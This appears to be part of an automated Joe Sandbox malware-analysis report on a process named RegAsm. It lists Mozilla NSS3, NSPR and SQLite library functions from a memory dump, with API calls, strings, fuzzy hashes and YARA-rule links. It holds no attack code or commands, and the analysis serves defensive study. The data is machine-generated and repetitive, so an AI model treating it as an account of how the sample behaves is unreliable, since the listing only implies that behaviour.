Opcode Fuzzy Hash: 8afba2e9e73cc14fe3ab782c78225a6987eeda65560d4318f2baa1c0562196cb
Instruction Fuzzy Hash: C95133F9D006019BEB009FA5EC05BAB76B4FF1531CF144635EC1A82A52FB31D526CAE2

Function 6C14ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C14ACE2
malloc.MOZGLUE(00000001), ref: 6C14ACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C14AD02
TlsGetValue.KERNEL32 ref: 6C14AD3C
calloc.MOZGLUE(00000001,?), ref: 6C14AD8C
PR_Unlock.NSS3 ref: 6C14ADC0
free.MOZGLUE(00000000), ref: 6C14AE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C14AE58
free.MOZGLUE(00000000), ref: 6C14AE69
free.MOZGLUE(?), ref: 6C14AE78
PR_Unlock.NSS3 ref: 6C14AE8C
free.MOZGLUE(?), ref: 6C14AEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C14AEC7

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: 9cc8b0f1320e32430cf1f134fabb4b87221355f7e2f436f2f4c923c29f040fb4
Instruction ID: fc595013b738deee325b28d5112e906373128a19faa80071e3adcd931a405126
Opcode Fuzzy Hash: 9cc8b0f1320e32430cf1f134fabb4b87221355f7e2f436f2f4c923c29f040fb4
Instruction Fuzzy Hash: 7651E0B0E012169BDF00DF98DC49BAE77B4BB16348F168035DC14A3B80E331A995CBE6

Function 6C224C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6C224CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C224CFD
sqlite3_value_text16.NSS3(?), ref: 6C224D44

Strings

bad parameter or other API misuse, xrefs: 6C224D05
no more rows available, xrefs: 6C224D2E
invalid, xrefs: 6C224CF1
unknown error, xrefs: 6C224D56
API call with %s database connection pointer, xrefs: 6C224CF6
another row available, xrefs: 6C224D20
out of memory, xrefs: 6C224C78, 6C224C9E
abort due to ROLLBACK, xrefs: 6C224D27, 6C224D33

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: c29c48c0472875d011020d1fd9b78288622999ceb29bdbc092b04712746eccaa
Instruction ID: b3928946b14e789b4f54758afcaad306bf94d1cba4345a1628995e5b3aa27acf
Opcode Fuzzy Hash: c29c48c0472875d011020d1fd9b78288622999ceb29bdbc092b04712746eccaa
Instruction Fuzzy Hash: 5631CE77E08A1FA7D7094A2CA811BE5B721778231EF050126EC244BF94CBACBC55C7E2

Function 6C182CD0 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6C182CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C182D07

Part of subcall function 6C2609D0: PR_Now.NSS3 ref: 6C260A22
Part of subcall function 6C2609D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C260A35
Part of subcall function 6C2609D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C260A66
Part of subcall function 6C2609D0: PR_GetCurrentThread.NSS3 ref: 6C260A70
Part of subcall function 6C2609D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C260A9D
Part of subcall function 6C2609D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C260AC8
Part of subcall function 6C2609D0: PR_vsmprintf.NSS3(?,?), ref: 6C260AE8
Part of subcall function 6C2609D0: EnterCriticalSection.KERNEL32(?), ref: 6C260B19
Part of subcall function 6C2609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C260B48
Part of subcall function 6C2609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C260C76
Part of subcall function 6C2609D0: PR_LogFlush.NSS3 ref: 6C260C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C182D22

Part of subcall function 6C2609D0: OutputDebugStringA.KERNEL32(?), ref: 6C260B88
Part of subcall function 6C2609D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C260C5D
Part of subcall function 6C2609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C260C8D
Part of subcall function 6C2609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C260C9C
Part of subcall function 6C2609D0: OutputDebugStringA.KERNEL32(?), ref: 6C260CD1
Part of subcall function 6C2609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C260CEC
Part of subcall function 6C2609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C260CFB
Part of subcall function 6C2609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C260D16
Part of subcall function 6C2609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C260D26
Part of subcall function 6C2609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C260D35
Part of subcall function 6C2609D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C260D65
Part of subcall function 6C2609D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C260D70
Part of subcall function 6C2609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C260D90
Part of subcall function 6C2609D0: free.MOZGLUE(00000000), ref: 6C260D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C182D3B

Part of subcall function 6C2609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C260BAB
Part of subcall function 6C2609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C260BBA
Part of subcall function 6C2609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C260D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C182D54

Part of subcall function 6C2609D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C260BCB
Part of subcall function 6C2609D0: EnterCriticalSection.KERNEL32(?), ref: 6C260BDE
Part of subcall function 6C2609D0: OutputDebugStringA.KERNEL32(?), ref: 6C260C16

Strings

pPin = 0x%p, xrefs: 6C182D1D
slotID = 0x%x, xrefs: 6C182D02
C_InitToken, xrefs: 6C182CE7
pLabel = 0x%p, xrefs: 6C182D4F
n&l, xrefs: 6C182D6C, 6C182D9A
ulPinLen = %d, xrefs: 6C182D36

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken$n&l
API String ID: 420000887-2760440913
Opcode ID: 3acdbfd42cef77b623b4f186ecb589520fb0fcf4d8bbafa8f61fe35cd126d010
Instruction ID: e450c2305d144b1ab7d0835bc916ad49229b0f3bfb6e4e9146ad9a84d56a76fd
Opcode Fuzzy Hash: 3acdbfd42cef77b623b4f186ecb589520fb0fcf4d8bbafa8f61fe35cd126d010
Instruction Fuzzy Hash: 842174B5206148AFDB01DB54DD8CB493FB6EB4231DF448514FD0897AA2DB30A849DF65

Function 6C222D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C222D9F

Part of subcall function 6C0DCA30: EnterCriticalSection.KERNEL32(?,?,?,6C13F9C9,?,6C13F4DA,6C13F9C9,?,?,6C10369A), ref: 6C0DCA7A
Part of subcall function 6C0DCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C0DCB26

sqlite3_exec.NSS3(?,?,6C222F70,?,?), ref: 6C222DF9
sqlite3_free.NSS3(00000000), ref: 6C222E2C
sqlite3_free.NSS3(?), ref: 6C222E3A
sqlite3_free.NSS3(?), ref: 6C222E52
sqlite3_mprintf.NSS3(6C28AAF9,?), ref: 6C222E62
sqlite3_free.NSS3(?), ref: 6C222E70
sqlite3_free.NSS3(?), ref: 6C222E89
sqlite3_free.NSS3(?), ref: 6C222EBB
sqlite3_free.NSS3(?), ref: 6C222ECB
sqlite3_free.NSS3(00000000), ref: 6C222F3E
sqlite3_free.NSS3(?), ref: 6C222F4C

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: 5d474fbe89a9f2da71c0412103321533cd93a391f3353e232e3e62ab5ca9bf2c
Instruction ID: 5e903ecb00bc94f1272287101bb99409379e17bdf4eec05f317437da39fffe81
Opcode Fuzzy Hash: 5d474fbe89a9f2da71c0412103321533cd93a391f3353e232e3e62ab5ca9bf2c
Instruction Fuzzy Hash: 686171F5E1020A8BEB10CF68D884B9E77F1AF48359F154024EC15A7741EB3AF845CBA1

Function 6C172C40 Relevance: 18.2, APIs: 12, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C173F23,?,6C16E477,?,?,?,00000001,00000000,?,?,6C173F23,?), ref: 6C172C62
EnterCriticalSection.KERNEL32(0000001C,?,6C16E477,?,?,?,00000001,00000000,?,?,6C173F23,?), ref: 6C172C76
PL_HashTableLookup.NSS3(00000000,?,?,6C16E477,?,?,?,00000001,00000000,?,?,6C173F23,?), ref: 6C172C86
PR_Unlock.NSS3(00000000,?,?,?,?,6C16E477,?,?,?,00000001,00000000,?,?,6C173F23,?), ref: 6C172C93

Part of subcall function 6C1FDD70: TlsGetValue.KERNEL32 ref: 6C1FDD8C
Part of subcall function 6C1FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C1FDDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6C16E477,?,?,?,00000001,00000000,?,?,6C173F23,?), ref: 6C172CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C16E477,?,?,?,00000001,00000000,?,?,6C173F23,?), ref: 6C172CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C16E477,?,?,?,00000001,00000000,?,?,6C173F23), ref: 6C172CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C16E477,?,?,?,00000001,00000000,?), ref: 6C172CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C16E477,?,?,?,00000001,00000000,?), ref: 6C172D4D
EnterCriticalSection.KERNEL32(?), ref: 6C172D61
PL_HashTableLookup.NSS3(?,?), ref: 6C172D71
PR_Unlock.NSS3(?), ref: 6C172D7E

Part of subcall function 6C1407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C0D204A), ref: 6C1407AD
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C0D204A), ref: 6C1407CD
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C0D204A), ref: 6C1407D6
Part of subcall function 6C1407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C0D204A), ref: 6C1407E4
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,6C0D204A), ref: 6C140864
Part of subcall function 6C1407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C140880
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,?,6C0D204A), ref: 6C1408CB
Part of subcall function 6C1407A0: TlsGetValue.KERNEL32(?,?,6C0D204A), ref: 6C1408D7
Part of subcall function 6C1407A0: TlsGetValue.KERNEL32(?,?,6C0D204A), ref: 6C1408FB

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID:
API String ID: 2446853827-0
Opcode ID: aa5a8729705f8f5cfb2980f7f0b12c3bd0986688f7fdb7f97e6f93d868b1efbd
Instruction ID: 57495546bc1daf0abfe33a17e8e3fbf325ce8daf2a36e4cd8b4f8bb7e35642a1
Opcode Fuzzy Hash: aa5a8729705f8f5cfb2980f7f0b12c3bd0986688f7fdb7f97e6f93d868b1efbd
Instruction Fuzzy Hash: 1E5127B5D00604EBDB109F24DC489AA77B4FF1925CB048520ED1897B11F731E965CBF1

Function 6C167C70 Relevance: 18.1, APIs: 12, Instructions: 141COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C2B2120,Function_00097E60,00000000,?,?,?,?,6C1E067D,6C1E1C60,00000000), ref: 6C167C81

Part of subcall function 6C0D4C70: TlsGetValue.KERNEL32(?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4C97
Part of subcall function 6C0D4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4CB0
Part of subcall function 6C0D4C70: PR_Unlock.NSS3(?,?,?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4CC9

TlsGetValue.KERNEL32 ref: 6C167CA0
EnterCriticalSection.KERNEL32(?), ref: 6C167CB4
PR_Unlock.NSS3 ref: 6C167CCF

Part of subcall function 6C1FDD70: TlsGetValue.KERNEL32 ref: 6C1FDD8C
Part of subcall function 6C1FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C1FDDB4

TlsGetValue.KERNEL32 ref: 6C167D04
EnterCriticalSection.KERNEL32(?), ref: 6C167D1B
realloc.MOZGLUE(-00000050), ref: 6C167D82
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C167DF4
PR_Unlock.NSS3 ref: 6C167E0E

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
String ID:
API String ID: 2305085145-0
Opcode ID: 48a5f5cc8a4e08cb6ce3ca18759edf6592e768ac38337c80c188e80cf171615a
Instruction ID: 26a22c9f03202f0903b63cd08069610abbcfca90147359357b2656b767757bb2
Opcode Fuzzy Hash: 48a5f5cc8a4e08cb6ce3ca18759edf6592e768ac38337c80c188e80cf171615a
Instruction Fuzzy Hash: 7451F5B1A10201AFDF00AF2EDC48B6577B5EB1231DF16852BDD0887B92EB319464CAD1

Function 6C0D4C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4C97
EnterCriticalSection.KERNEL32(?,?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4CB0
PR_Unlock.NSS3(?,?,?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4D97
PR_Lock.NSS3(?,?,?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4DBA
PR_WaitCondVar.NSS3 ref: 6C0D4DD4
PR_Unlock.NSS3(?,?,?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4DEF

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: 69cf2e9534caaa3a9ec5ce9710f71f3668db60f2f95681109275d0c8844d15cb
Instruction ID: f2027631e63cf2c5ed61cb5d21f5aba2773f0f527c6ef8c6aaab51fcf2ef0b8c
Opcode Fuzzy Hash: 69cf2e9534caaa3a9ec5ce9710f71f3668db60f2f95681109275d0c8844d15cb
Instruction Fuzzy Hash: FA416CB1A047559FCB00AFB9D08866DBBF4BF05318F168669DC989B780E730E884CB95

Function 6C178F70 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C16DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C178FAF
PR_Now.NSS3(?,?,00000002,?,?,?,6C16DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C178FD1
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C16DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C178FFA
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C16DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C179013
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C16DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C179042
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C16DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C17905A
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C16DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C179073
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C16DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C1790EC

Part of subcall function 6C140F00: PR_GetPageSize.NSS3(6C140936,FFFFE8AE,?,6C0D16B7,00000000,?,6C140936,00000000,?,6C0D204A), ref: 6C140F1B
Part of subcall function 6C140F00: PR_NewLogModule.NSS3(clock,6C140936,FFFFE8AE,?,6C0D16B7,00000000,?,6C140936,00000000,?,6C0D204A), ref: 6C140F25

PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C16DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C179111

Strings

n&l, xrefs: 6C1790A3

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
String ID: n&l
API String ID: 2831689957-653591135
Opcode ID: 40829c90e322b654281976e17ab751115af8f6b4bfeabc0019e07bed6eb0d1c4
Instruction ID: 057d0459fdeb93dc23447eda97fe4ccc8424d24d3fe523cb8ce7b3c1a8562f54
Opcode Fuzzy Hash: 40829c90e322b654281976e17ab751115af8f6b4bfeabc0019e07bed6eb0d1c4
Instruction Fuzzy Hash: 84519CB4A042058FDB10EF78C498299BBF4AF0A318F0545A9DC449B755EB35E888CBA1

Function 6C267CD0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113threadstringCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C267CE0

Part of subcall function 6C219BF0: TlsGetValue.KERNEL32(?,?,?,6C260A75), ref: 6C219C07

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C267D36
PR_Realloc.NSS3(?,00000080), ref: 6C267D6D
PR_GetCurrentThread.NSS3 ref: 6C267D8B
PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6C267DC2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C267DD8
malloc.MOZGLUE(00000080), ref: 6C267DF8
PR_GetCurrentThread.NSS3 ref: 6C267E06

Strings

:%s:%d:0x%lx, xrefs: 6C267DB9
NSPR_INHERIT_FDS=%s:%d:0x%lx, xrefs: 6C267DF0

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
API String ID: 530461531-3274975309
Opcode ID: 2dc5c122c6b7e9db03103e8ad790c0567fe3d6cd5106ce08ceb334d721f1ddf4
Instruction ID: 7c909cb7864f07658f58fbb1d7b86af26482d633eee8001390f726db25db7788
Opcode Fuzzy Hash: 2dc5c122c6b7e9db03103e8ad790c0567fe3d6cd5106ce08ceb334d721f1ddf4
Instruction Fuzzy Hash: E941C5B56102099FDB04CF2ADC80E6A37A6FF84718B154968EC198BF51D731E991CBB1

Function 6C186C40 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6C186C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C186C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C186CA3

Part of subcall function 6C26D930: PL_strncpyz.NSS3(?,?,?), ref: 6C26D963

PR_LogPrint.NSS3(?,00000000), ref: 6C186CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C186CD5

Strings

(CK_INVALID_HANDLE), xrefs: 6C186C9C
hSession = 0x%x, xrefs: 6C186C7E, 6C186C8E
pMechanism = 0x%p, xrefs: 6C186CD0
C_DigestInit, xrefs: 6C186C61
n&l, xrefs: 6C186CF4, 6C186D1F

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
